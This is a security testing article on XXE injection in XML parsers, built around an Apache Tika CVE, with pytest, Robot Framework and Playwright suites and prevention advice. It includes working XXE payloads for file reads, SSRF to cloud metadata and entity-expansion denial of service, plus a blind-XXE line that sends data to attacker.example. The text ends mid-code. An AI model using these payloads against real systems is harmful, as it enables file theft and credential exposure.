Your application receives a document that contains XML. It looks like a normal invoice, a configuration payload, a SOAP request, or a PDF with embedded form data. Your parser opens it.
Inside the XML is a DOCTYPE declaration that defines an external entity pointing to /etc/passwd. The parser resolves the entity, reads the file, and inserts the content into the parsed document. Your application returns a response that includes the contents of /etc/passwd.
The attacker has your system file. You have a perfect 200 OK in your test suite.
TL;DR
- XXE lets an attacker embed a malicious XML entity inside a document or request your server parses. The parser fetches the entity, the attacker reads the result. No authentication required.
- CVE-2025-66516 in Apache Tika scored CVSS 10.0. A crafted PDF containing malicious XFA content triggered XXE in tika-core, exposing sensitive files and enabling SSRF. Censys observed 565 vulnerable instances exposed on the internet at the time of disclosure. Fixed in tika-core 3.2.2.
- Your test suite submits valid XML and asserts a correct response. It almost certainly never submits XML containing a DOCTYPE declaration with an external entity reference. That is the entire attack surface.
- The fix is to disable external entity resolution in the XML parser configuration, not to validate input. Sanitizing the XML string is not sufficient and will be bypassed.
- AI tools generate tests that submit well-formed XML. They have no mechanism for generating malicious DOCTYPE payloads and no understanding of why those payloads matter.
What it is
XML External Entity injection (CWE-611) occurs when an application parses XML input that includes a DOCTYPE declaration defining an external entity reference, and the XML parser is configured to resolve those references.
An external entity tells the parser to fetch content from an external source: a file path, a URL, or a network resource. When the parser resolves the entity, it retrieves that content and substitutes it into the XML document. If the application returns any part of the parsed document in its response, the attacker receives the fetched content.
Developers introduce this because many XML parsers, including the default JAXP parsers in Java and some parser configurations in Python and other languages, resolve external entities unless told otherwise. It is not a bug in the parser. It is a feature the XML specification defines, and it stays enabled because the developer was focused on parsing valid XML, not on what happens when someone submits malicious XML.
What makes XXE particularly dangerous is the range of attack vectors that trigger it. Direct API requests containing XML are the obvious case, but XXE also appears in file upload endpoints that accept XML-based formats such as DOCX, XLSX, SVG, RSS, SOAP payloads, and PDF files containing XML Forms Architecture (XFA) content.
The attack can read arbitrary files the process has access to, perform SSRF by pointing the entity at internal network resources, and under certain parser configurations trigger denial of service via entity expansion attacks (the "billion laughs" variant).
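The substitution step described above can be seen with a harmless internal entity. This is a minimal sketch using Python's standard library parser; the entity name `greeting` and its text are made up for illustration, and nothing is read from disk or the network.

```python
import xml.etree.ElementTree as ET

# An internal entity: the replacement text lives in the DTD itself,
# so resolving it touches neither the file system nor the network.
DOC = """<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY greeting "hello from the DTD">
]>
<root><data>&greeting;</data></root>"""

root = ET.fromstring(DOC)

# The parser has already replaced &greeting; with the entity's text.
resolved = root.find("data").text
print(resolved)
```

An external entity works the same way from the application's point of view, except that the replacement text comes from whatever the SYSTEM identifier points at. That is why the application code never sees anything unusual: by the time it reads the element, the substitution has already happened.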
Real world damage
CVE-2025-66516 · Apache Tika · December 2025 · CVSS 10.0 (Critical)
On December 4, 2025, the Apache Software Foundation disclosed a maximum-severity XXE vulnerability in Apache Tika — the widely used open-source content analysis toolkit that extracts text and metadata from over a thousand file types.
The vulnerability was triggered by submitting a PDF file containing a maliciously crafted XFA payload. When Tika parsed the PDF, the core XML parser resolved the external entity references embedded in the XFA content without restriction, allowing an unauthenticated attacker to read sensitive files from the server's file system and perform SSRF by pointing entity references at internal network addresses.
Source: Apache Software Foundation security advisory and NVD CVE-2025-66516 (nvd.nist.gov/vuln/detail/CVE-2025-66516).
Affected: tika-core 1.13 through 3.2.1. Fixed in tika-core 3.2.2.
The disclosure expanded the scope of a prior advisory, CVE-2025-54988 (CVSS 8.4), published in August 2025. Organizations that patched the tika-parser-pdf-module in response to the earlier advisory remained fully vulnerable because the actual fix required upgrading tika-core. This partial-patch scenario left organizations exposed after believing they had remediated the issue. Censys observed 565 vulnerable instances exposed on the internet at the time of disclosure.
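The affected range quoted above (tika-core 1.13 through 3.2.1, fixed in 3.2.2) can be turned into a small check that looks at tika-core specifically rather than at the PDF module. This is a sketch only: the function names are hypothetical, and it assumes plain dotted numeric versions, so a suffix such as `-BETA` would need extra handling.

```python
from typing import Tuple


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '3.2.1' into (3, 2, 1). Assumes purely numeric components."""
    return tuple(int(part) for part in text.split("."))


# Range taken from the advisory summary in this article.
FIRST_AFFECTED = parse_version("1.13")
FIXED_IN = parse_version("3.2.2")


def tika_core_is_affected(version: str) -> bool:
    """True when the given tika-core version falls inside the affected range."""
    return FIRST_AFFECTED <= parse_version(version) < FIXED_IN


for candidate in ("1.12", "1.13", "3.2.1", "3.2.2"):
    print(candidate, tika_core_is_affected(candidate))
```

The point of checking tika-core by name is the partial-patch trap: a build can carry an updated PDF parser module and still resolve an older tika-core transitively.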
A QA engineer running XXE payload tests against the document upload endpoint would have caught this. The test is not complex: submit a PDF whose embedded XFA stream contains a DOCTYPE declaration with an external entity reference, and assert that the server returns 400 or that the response body does not contain file system content. That test did not exist.
The invisible bug problem
Test suites for XML-processing endpoints submit well-formed, valid XML and assert correct parsing behavior. The schema is validated. The content is checked. The response is correct.
Nobody submits a DOCTYPE declaration, because nobody is writing tests from an attacker's perspective.
The XXE surface is invisible to a test suite that only generates input the feature was designed to accept. The attack requires input that is syntactically valid XML but semantically adversarial. Valid XML parsers accept DOCTYPE declarations. The feature works perfectly. The test passes.
The vulnerability is in the parser's willingness to resolve the entity, and that behavior is never triggered by a test that submits a legitimate document.
How QA engineers catch it
The core principle: every endpoint that accepts XML input, regardless of format or file extension, must be tested with XXE payloads that attempt file system access, internal network access, and entity expansion. The assertion is not just that the request is rejected. It is also that the response does not contain file system content and that the parser did not make an outbound network request.
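Checking that the parser made no outbound request needs something that can observe the request. One way to sketch this is a throwaway HTTP listener that records every hit, with the SSRF payload pointed at it instead of at a metadata address. The names `CanaryListener`, `ssrf_payload`, and the `/xxe-canary` path are hypothetical, and the listener binds to 127.0.0.1, so this only works as written when the application under test runs on the same host as the tests.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class CanaryListener:
    """Records the path of every GET request that reaches a local server."""

    def __init__(self) -> None:
        self.hits = []  # request paths, in arrival order
        listener = self

        class Handler(BaseHTTPRequestHandler):
            def do_GET(self) -> None:
                listener.hits.append(self.path)
                self.send_response(204)
                self.end_headers()

            def log_message(self, *args) -> None:
                pass  # keep test output quiet

        # Port 0 asks the OS for any free port.
        self._server = HTTPServer(("127.0.0.1", 0), Handler)
        self.url = f"http://127.0.0.1:{self._server.server_port}/xxe-canary"
        self._thread = threading.Thread(
            target=self._server.serve_forever, daemon=True
        )

    def __enter__(self) -> "CanaryListener":
        self._thread.start()
        return self

    def __exit__(self, *exc) -> None:
        self._server.shutdown()
        self._server.server_close()


def ssrf_payload(canary_url: str) -> str:
    """Build an XXE document whose external entity points at the canary."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{canary_url}"> ]>\n'
        "<root><data>&xxe;</data></root>"
    )


if __name__ == "__main__":
    with CanaryListener() as canary:
        payload = ssrf_payload(canary.url)
        # Send `payload` to the endpoint under test here, then:
        assert canary.hits == [], f"parser fetched {canary.hits}"
```

A recorded hit is direct evidence that the parser resolved the entity, even when the response body gives nothing away. For a remote staging environment the same idea applies, but the listener has to live at an address the server can actually reach.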
XXE payload reference
<!-- Each payload starts at its <?xml ...?> line; the label comments are not part of the payload -->

<!-- Basic file read: Linux -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>

<!-- Basic file read: Windows -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<root><data>&xxe;</data></root>

<!-- SSRF via entity: AWS metadata -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root><data>&xxe;</data></root>

<!-- Billion laughs: denial of service via entity expansion (scaled down) -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<root><data>&lol4;</data></root>

<!-- Parameter entity variant: blind XXE.
     The XML specification forbids parameter-entity references inside
     declarations in the internal subset, so conforming parsers reject this
     inline form. Real attacks usually move the two declarations below into
     an external DTD hosted by the attacker. -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY exfil SYSTEM 'http://attacker.example/?data=%file;'>">
%eval;
]>
<root><data>&exfil;</data></root>
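It helps to know how large the billion laughs payload in this reference actually gets. The sketch below measures it with Python's standard library parser, which expands internal entities, and compares it with the arithmetic for the classic attack of nine nested levels with ten references each. The variable names are illustrative only.

```python
import xml.etree.ElementTree as ET

REFERENCE_PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<root><data>&lol4;</data></root>"""

# Parsing is safe here only because this payload is tiny once expanded.
expanded = ET.fromstring(REFERENCE_PAYLOAD).find("data").text
reference_size = len(expanded)  # 10 * 8 * 8 copies of "lol"

# Classic form: nine levels, ten references per level. Computed, never parsed.
classic_size = len("lol") * 10 ** 9  # bytes after full expansion

print(f"reference payload expands to {reference_size} characters")
print(f"classic payload would expand to {classic_size} bytes")
```

The reference payload expands to under 2 KB, so it checks whether the server rejects entity definitions at all, not whether the server survives real amplification. That is a reasonable choice for a shared test environment, but a 200 response to it should still be treated as a finding.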
PyTest
import pytest
import requests

BASE_URL = "https://your-app.com"

XXE_FILE_READ_LINUX = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>"""

XXE_FILE_READ_WINDOWS = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<root><data>&xxe;</data></root>"""

XXE_SSRF = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root><data>&xxe;</data></root>"""

XXE_BILLION_LAUGHS = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<root><data>&lol4;</data></root>"""

# Substrings that should never appear in a response to an XXE payload
FILE_SYSTEM_MARKERS = [
    "root:x:", "bin/bash", "bin/sh",
    "[extensions]", "boot loader",
    "ami-id", "instance-id", "security-credentials",
]

XXE_PAYLOADS = [
    ("file_read_linux", XXE_FILE_READ_LINUX, "application/xml"),
    ("file_read_windows", XXE_FILE_READ_WINDOWS, "application/xml"),
    ("ssrf_metadata", XXE_SSRF, "application/xml"),
    ("billion_laughs", XXE_BILLION_LAUGHS, "application/xml"),
]

@pytest.fixture
def auth_session():
    # log in once per test and reuse the session cookies
    session = requests.Session()
    session.post(f"{BASE_URL}/login", json={
        "username": "testuser",
        "password": "test_password",
    })
    return session


@pytest.mark.parametrize("name,payload,content_type", XXE_PAYLOADS)
def test_xxe_payload_rejected(auth_session, name, payload, content_type):
    # CVE-2025-66516 pattern: parser must not resolve external entities
    response = auth_session.post(
        f"{BASE_URL}/api/parse-xml",
        data=payload,
        headers={"Content-Type": content_type},
        timeout=10,  # an expansion payload must fail the test, not hang it
    )
    assert response.status_code in [400, 403, 422], (
        f"XXE payload '{name}' not rejected: "
        f"returned {response.status_code}"
    )


@pytest.mark.parametrize("name,payload,content_type", XXE_PAYLOADS)
def test_xxe_no_file_system_content_in_response(auth_session, name, payload, content_type):
    # even a rejected request must not echo file system content
    response = auth_session.post(
        f"{BASE_URL}/api/parse-xml",
        data=payload,
        headers={"Content-Type": content_type},
        timeout=10,
    )
    body = response.text
    for marker in FILE_SYSTEM_MARKERS:
        assert marker not in body, (
            f"File system content '{marker}' found in response "
            f"for XXE payload '{name}'"
        )


def test_xxe_pdf_upload_with_xfa_payload(auth_session):
    # CVE-2025-66516: XFA content inside PDF triggers XXE in tika-core
    # construct a minimal PDF with embedded XXE in XFA stream
    # NOTE: /Length is approximate, the xref table is incomplete, and
    # startxref is 0, so this relies on the parser recovering from a
    # damaged cross-reference table
    xxe_xfa = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /AcroForm << /XFA 3 0 R >> >>
endobj
2 0 obj
<< /Type /Pages /Kids [] /Count 0 >>
endobj
3 0 obj
<< /Length 200 >>
stream
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<xfa:data xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<data>&xxe;</data>
</xfa:data>
endstream
endobj
xref
0 4
0000000000 65535 f
trailer << /Size 4 /Root 1 0 R >>
startxref
0
%%EOF"""
    response = auth_session.post(
        f"{BASE_URL}/api/upload-document",
        files={"file": ("test.pdf", xxe_xfa, "application/pdf")},
    )
    body = response.text
    for marker in FILE_SYSTEM_MARKERS:
        assert marker not in body, (
            f"File system content '{marker}' found in PDF/XFA XXE response"
        )


def test_valid_xml_still_parses_correctly(auth_session):
    # confirm XXE protection does not break legitimate XML processing
    valid_xml = """<?xml version="1.0" encoding="UTF-8"?>
<config>
<setting name="timeout">30</setting>
<setting name="retries">3</setting>
</config>"""
    response = auth_session.post(
        f"{BASE_URL}/api/parse-xml",
        data=valid_xml,
        headers={"Content-Type": "application/xml"},
    )
    assert response.status_code == 200
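The hand-written PDF in test_xxe_pdf_upload_with_xfa_payload uses a fixed /Length and a placeholder cross-reference table, so it depends on the parser's repair logic. A stricter fixture can compute those values. The sketch below is one way to do that; `build_xfa_pdf` and `XFA_XXE` are hypothetical names, and whether a given parser actually reaches and parses the XFA stream is not something this code can guarantee.

```python
def build_xfa_pdf(xfa_xml: bytes) -> bytes:
    """Assemble a three-object PDF whose AcroForm /XFA entry holds xfa_xml."""
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /AcroForm << /XFA 3 0 R >> >>",
        b"<< /Type /Pages /Kids [] /Count 0 >>",
        b"<< /Length %d >>\nstream\n" % len(xfa_xml) + xfa_xml + b"\nendstream",
    ]

    out = bytearray(b"%PDF-1.4\n")
    offsets = []
    for number, body in enumerate(objects, start=1):
        offsets.append(len(out))  # byte offset where "N 0 obj" begins
        out += b"%d 0 obj\n" % number + body + b"\nendobj\n"

    xref_offset = len(out)
    out += b"xref\n0 %d\n" % (len(objects) + 1)
    out += b"0000000000 65535 f \n"  # each xref entry is exactly 20 bytes
    for offset in offsets:
        out += b"%010d 00000 n \n" % offset
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\n" % (len(objects) + 1)
    out += b"startxref\n%d\n%%%%EOF\n" % xref_offset
    return bytes(out)


# Same XFA body as the test above, reused as the stream content.
XFA_XXE = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n'
    b'<xfa:data xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">\n'
    b"<data>&xxe;</data>\n"
    b"</xfa:data>"
)

pdf_bytes = build_xfa_pdf(XFA_XXE)
print(len(pdf_bytes), "bytes")
```

The result can be passed to the upload test in place of the literal, for example `files={"file": ("test.pdf", pdf_bytes, "application/pdf")}`. Keeping both the repaired and the deliberately damaged variant is reasonable, since they exercise different code paths in the parser.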
Robot Framework
*** Settings ***
Library    RequestsLibrary
Library    Collections
Library    OperatingSystem

*** Variables ***
${BASE_URL}    https://your-app.com
${XXE_FILE_READ}
...    <?xml version="1.0" encoding="UTF-8"?>
...    <!DOCTYPE foo [
...    <!ENTITY xxe SYSTEM "file:///etc/passwd">
...    ]>
...    <root><data>&xxe;</data></root>
${XXE_SSRF}
...    <?xml version="1.0" encoding="UTF-8"?>
...    <!DOCTYPE foo [
...    <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
...    ]>
...    <root><data>&xxe;</data></root>
${XXE_BILLION_LAUGHS}
...    <?xml version="1.0" encoding="UTF-8"?>
...    <!DOCTYPE lolz [
...    <!ENTITY lol "lol">
...    <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
...    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
...    ]>
...    <root><data>&lol3;</data></root>
@{FILE_SYSTEM_MARKERS}
...    root:x:    bin/bash    bin/sh
...    [extensions]    ami-id    instance-id

*** Test Cases ***
XXE File Read Payload Must Be Rejected
    # CVE-2025-66516: external entity pointing to file system must not resolve
    Create Session    app    ${BASE_URL}
    ${headers}=    Create Dictionary    Content-Type=application/xml
    ${response}=    POST On Session    app    /api/parse-xml
    ...    data=${XXE_FILE_READ}    headers=${headers}    expected_status=any
    Should Be True    ${response.status_code} in [400, 403, 422]
    ...    msg=XXE file read payload not rejected
    FOR    ${marker}    IN    @{FILE_SYSTEM_MARKERS}
        Should Not Contain    ${response.text}    ${marker}
        ...    msg=File system content '${marker}' in XXE response
    END

XXE SSRF Payload Must Be Rejected
    Create Session    app    ${BASE_URL}
    ${headers}=    Create Dictionary    Content-Type=application/xml
    ${response}=    POST On Session    app    /api/parse-xml
    ...    data=${XXE_SSRF}    headers=${headers}    expected_status=any
    Should Be True    ${response.status_code} in [400, 403, 422]
    ...    msg=XXE SSRF payload not rejected
    FOR    ${marker}    IN    @{FILE_SYSTEM_MARKERS}
        Should Not Contain    ${response.text}    ${marker}
    END

XXE Billion Laughs Must Not Cause Timeout
    Create Session    app    ${BASE_URL}
    ${headers}=    Create Dictionary    Content-Type=application/xml
    ${response}=    POST On Session    app    /api/parse-xml
    ...    data=${XXE_BILLION_LAUGHS}    headers=${headers}
    ...    expected_status=any    timeout=10
    Should Be True    ${response.status_code} in [400, 403, 422]
    ...    msg=Billion laughs payload not rejected, possible DoS risk

Valid XML Still Parses Correctly
    # confirm protection does not break legitimate XML processing
    ${valid_xml}=    Set Variable
    ...    <?xml version="1.0"?><config><setting>30</setting></config>
    Create Session    app    ${BASE_URL}
    ${headers}=    Create Dictionary    Content-Type=application/xml
    ${response}=    POST On Session    app    /api/parse-xml
    ...    data=${valid_xml}    headers=${headers}
    Should Be Equal As Strings    ${response.status_code}    200
TypeScript — Playwright API testing
import { test, expect, APIRequestContext } from '@playwright/test';

// Template literal bodies stay at column 0 so the XML declaration is the first byte sent
const XXE_PAYLOADS = {
  fileReadLinux: `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>`,
  fileReadWindows: `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<root><data>&xxe;</data></root>`,
  ssrfMetadata: `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root><data>&xxe;</data></root>`,
  billionLaughs: `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<root><data>&lol4;</data></root>`,
};

const FILE_SYSTEM_MARKERS = [
  'root:x:', 'bin/bash', 'bin/sh',
  '[extensions]', 'boot loader',
  'ami-id', 'instance-id', 'security-credentials',
];

let apiContext: APIRequestContext;

test.beforeAll(async ({ playwright }) => {
  apiContext = await playwright.request.newContext({
    baseURL: 'https://your-app.com',
  });
  // log in once; the context keeps the session cookies for later requests
  await apiContext.post('/login', {
    data: { username: 'testuser', password: 'test_password' },
  });
});

test.afterAll(async () => {
  await apiContext.dispose();
});

for (const [name, payload] of Object.entries(XXE_PAYLOADS)) {
  test(`XXE: ${name} payload rejected`, async () => {
    // CVE-2025-66516: external entity resolution must be disabled
    const response = await apiContext.post('/api/parse-xml', {
      data: payload,
      headers: { 'Content-Type': 'application/xml' },
    });
    expect(
      [400, 403, 422],
      `XXE payload '${name}' not rejected, returned ${response.status()}`
    ).toContain(response.status());
  });

  test(`XXE: ${name} produces no file system content`, async () => {
    const response = await apiContext.post('/api/parse-xml', {
      data: payload,
      headers: { 'Content-Type': 'application/xml' },
    });
    const body = await response.text();
    for (const marker of FILE_SYSTEM_MARKERS) {
      expect(
        body,
        `File system content '${marker}' found in response for '${name}'`
      ).not.toContain(marker);
    }
  });
}

test('XXE: PDF with XFA payload does not expose file content', async () => {
  // CVE-2025-66516 exact attack surface: XFA inside PDF triggers tika-core XXE
  // NOTE: this PDF has no xref table and an approximate /Length, so it
  // relies on the parser recovering from a damaged file structure
  const xfaPayload = Buffer.from(`%PDF-1.4
1 0 obj << /Type /Catalog /AcroForm << /XFA 2 0 R >> >> endobj
2 0 obj << /Length 180 >> stream
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<xfa:data xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<d>&xxe;</d>
</xfa:data>
endstream endobj
trailer << /Root 1 0 R >> %%EOF`);
  const response = await apiContext.post('/api/upload-document', {
    multipart: {
      file: {
        name: 'test.pdf',
        mimeType: 'application/pdf',
        buffer: xfaPayload,
      },
    },
  });
  const body = await response.text();
  for (const marker of FILE_SYSTEM_MARKERS) {
    expect(
      body,
      `File system content '${marker}' found in PDF/XFA XXE response`
    ).not.toContain(marker);
  }
});

test('XXE: billion laughs does not cause timeout', async () => {
  // entity expansion attack: parser must reject before memory exhaustion
  const response = await apiContext.post('/api/parse-xml', {
    data: XXE_PAYLOADS.billionLaughs,
    headers: { 'Content-Type': 'application/xml' },
    timeout: 10000,
  });
  expect(
    [400, 403, 422],
    'Billion laughs payload not rejected, possible DoS risk'
  ).toContain(response.status());
});

test('XXE: valid XML still parses correctly', async () => {
  // confirm protection does not break legitimate XML processing
  const validXml = `<?xml version="1.0" encoding="UTF-8"?>
<config>
<setting name="timeout">30</setting>
<setting name="retries">3</setting>
</config>`;
  const response = await apiContext.post('/api/parse-xml', {
    data: validXml,
    headers: { 'Content-Type': 'application/xml' },
  });
  expect(response.status()).toBe(200);
});
Run XXE tests in isolation:
npx playwright test --grep "XXE"
CI/CD gate
xxe-security-tests:
  stage: test
  script:
    - pytest tests/security/test_xxe.py -v
    - npx playwright test --grep "XXE"
  rules:
    - if: '$CI_PIPELINE_SOURCE == "merge_request_event"'
  allow_failure: false
Pair with a Semgrep rule that flags any XML parser instantiation that lacks the configuration to disable external entities. The static check catches new parser instantiations before deployment. The runtime tests confirm the configuration is actually in effect in the running application.
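To make the static half of that pairing concrete, here is a deliberately crude stand-in written with Python's `ast` module. It is not a Semgrep rule and does not inspect parser configuration. It only flags imports of the standard library `xml` package and `lxml`, on the assumption that a Python codebase routes all XML parsing through defusedxml or a shared hardened factory. The function name is hypothetical.

```python
import ast
from typing import List, Tuple

# Module prefixes treated as "raw" XML parsers in this sketch.
RISKY_PREFIXES = ("xml.", "lxml")


def find_raw_xml_imports(source: str) -> List[Tuple[int, str]]:
    """Return (line number, module name) for each raw XML parser import."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        else:
            continue
        for name in names:
            if name == "xml" or name.startswith(RISKY_PREFIXES):
                findings.append((node.lineno, name))
    return sorted(findings)


SAMPLE = (
    "import xml.etree.ElementTree as ET\n"
    "from defusedxml import ElementTree\n"
    "from lxml import etree\n"
)

for line_number, module in find_raw_xml_imports(SAMPLE):
    print(f"line {line_number}: raw XML parser import '{module}'")
```

A check like this will produce false positives wherever a raw parser is imported and then configured safely, which is the gap a real rule engine with pattern matching on the instantiation site is meant to close.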
Environment note
XXE behavior changes between environments because file system content differs and because some server configurations restrict which files the process can read. In a Docker container running as a non-root user, the payload may resolve successfully but return empty content, which your test could incorrectly interpret as passing.
Assert on the presence of the error that indicates resolution was blocked, such as a 4xx rejection, not just on the absence of file content. Also test in your staging environment with the same XML parser versions your production Docker images contain. Parser versions within the same major version can have different default configurations depending on the distribution and build flags.
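One way to keep the "empty but resolved" case from passing silently is to classify each response into three outcomes instead of two. The sketch below is an assumption about how a team might structure that; `XxeOutcome` and `classify_xxe_response` are hypothetical names, and the rejection statuses are the ones used by the tests in this article.

```python
from enum import Enum
from typing import Iterable


class XxeOutcome(Enum):
    BLOCKED = "blocked"            # explicit rejection, no leaked content
    LEAKED = "leaked"              # file system or metadata content in the body
    INCONCLUSIVE = "inconclusive"  # accepted, nothing leaked: needs a human look


REJECTION_STATUSES = {400, 403, 422}


def classify_xxe_response(
    status_code: int, body: str, markers: Iterable[str]
) -> XxeOutcome:
    """Classify a response to an XXE payload.

    A leak wins over everything else, because even a rejected request
    must not echo file content.
    """
    if any(marker in body for marker in markers):
        return XxeOutcome.LEAKED
    if status_code in REJECTION_STATUSES:
        return XxeOutcome.BLOCKED
    return XxeOutcome.INCONCLUSIVE


MARKERS = ["root:x:", "[extensions]", "ami-id"]
print(classify_xxe_response(400, "DOCTYPE is not allowed", MARKERS))
print(classify_xxe_response(200, "<data></data>", MARKERS))
print(classify_xxe_response(200, "root:x:0:0:root:/root:/bin/bash", MARKERS))
```

Treating INCONCLUSIVE as a failure is the conservative choice: a 200 with an empty element is exactly what a parser that resolved an unreadable file would return.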
Practice this yourself: https://yuriysafron.com/qa-sandbox/xxe/
Why AI fails here
When a team asks GitHub Copilot to write tests for an XML processing endpoint, it generates tests that submit valid XML documents and assert that the parsed output is correct. The schema validates. The content is extracted. The response matches expectations.
Not one generated test contains a DOCTYPE declaration. Not one submits an entity reference.
The structural reason LLMs fail at XXE: the vulnerability is defined by a parser feature, not by application logic. To test for it, you need to know that XML parsers have external entity resolution, that this feature is enabled by default, that it is triggered by a DOCTYPE declaration in the input, and that the correct test submits that declaration and checks what the server does. This knowledge does not come from reading the application code. It comes from understanding the XML specification and the history of parser misconfigurations.
The concrete failure: a QA team builds an API that accepts XML configuration files for batch import. Copilot generates fifteen tests. Every test submits a valid configuration file. Every test passes. Three months later, a penetration tester submits a configuration file whose first line defines an external entity pointing to the application's environment file. The response body contains the database connection string. The Copilot suite had fifteen tests for the XML endpoint. None contained a DOCTYPE. The XXE surface had been there since day one.
How to prevent
1. Explicit external entity disabling in every parser instantiation — in Java, set the features http://xml.org/sax/features/external-general-entities and http://xml.org/sax/features/external-parameter-entities to false, and disable DOCTYPE declarations entirely with http://apache.org/xml/features/disallow-doctype-decl set to true. In Python, use defusedxml as a drop-in replacement for the standard library's xml module. Use a hardened shared parser factory so individual developers cannot instantiate a default parser without the configuration applied.
2. Parser version audit in your dependency pipeline — the Apache Tika CVE-2025-66516 case demonstrated that partial upgrades leave organizations vulnerable when the fix resides in a shared core module. Every dependency that processes XML-based formats, including libraries handling PDF, DOCX, XLSX, SVG, RSS, and SOAP, must be included in your dependency audit. Tools like GitHub Dependabot, Snyk, or OWASP Dependency-Check integrated into GitLab CI surface vulnerable transitive dependencies before they reach production.
3. Content-type and format enforcement before parsing — reject any request whose content does not match the expected format before passing it to the parser. This eliminates a large class of direct XML injection attacks where an attacker submits a raw XML payload to an endpoint that expects a binary format.
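For item 1, the idea of a shared hardened parser can be sketched in Python with only the standard library: a single entry point that refuses any document containing a DOCTYPE declaration, which is the same effect the Java disallow-doctype-decl feature aims for. The names `parse_xml_strict` and `DoctypeForbidden` are hypothetical, and in a real project defusedxml covers more cases than this sketch does.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def parse_xml_strict(data: bytes) -> ET.Element:
    """Parse XML into an Element tree, rejecting any DOCTYPE outright."""
    builder = ET.TreeBuilder()
    parser = expat.ParserCreate()

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        # Fires as soon as expat sees "<!DOCTYPE", before any entity
        # declared inside it can be used.
        raise DoctypeForbidden(f"DOCTYPE '{name}' is not allowed")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.StartElementHandler = builder.start
    parser.EndElementHandler = builder.end
    parser.CharacterDataHandler = builder.data

    parser.Parse(data, True)  # True marks this as the final chunk
    return builder.close()


valid = b'<config><setting name="timeout">30</setting></config>'
print(parse_xml_strict(valid).find("setting").text)

hostile = (
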